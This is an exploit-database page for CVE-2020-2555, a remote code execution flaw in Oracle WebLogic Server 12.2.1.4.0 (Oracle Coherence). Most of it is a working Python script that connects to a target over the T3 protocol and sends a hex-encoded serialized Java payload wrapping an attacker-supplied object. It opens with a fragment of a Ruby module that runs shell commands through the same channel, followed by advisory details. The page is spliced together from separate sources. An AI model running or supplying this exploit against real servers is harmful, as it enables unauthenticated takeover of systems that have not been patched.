formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
end
formatted_payload
end
def execute_command(cmd, _opts = {})
cmd.prepend('/bin/sh -c ')
cmd = build_payload_obj(cmd)
t3_send(cmd)
end
endOracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
# Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
# Author: nu11secur1ty
# Date: 2020-03-31
# Vendor: Oracle
# Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
# CVE: CVE-2020-2555
[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source: readme from GitHUB
[Exploit Program Code]
--------------------------
#!/usr/bin/python
# @nu11secur1ty
import socket
import os
import sys
import struct
if len(sys.argv) < 3:
print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)
# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
payloadObj = open(sys.argv[3],'rb').read()
payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
payload=struct.pack('>I',len(payload)) + payload[4:]
print '[+] Sending payload...'
sock.send(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
[Vendor]
Oracle
[Vulnerability Type]
Network Remote
[Description]
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation).
Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.
Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence.
Successful attacks of this vulnerability can result in takeover of Oracle Coherence.
CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
[Disclosure Timeline]
2019/12/10
[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or reserved,
and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
[Video]
https://www.youtube.com/watch?v=59jt8rr8ECc
@nu11secur1ty
--
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1tyMetasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.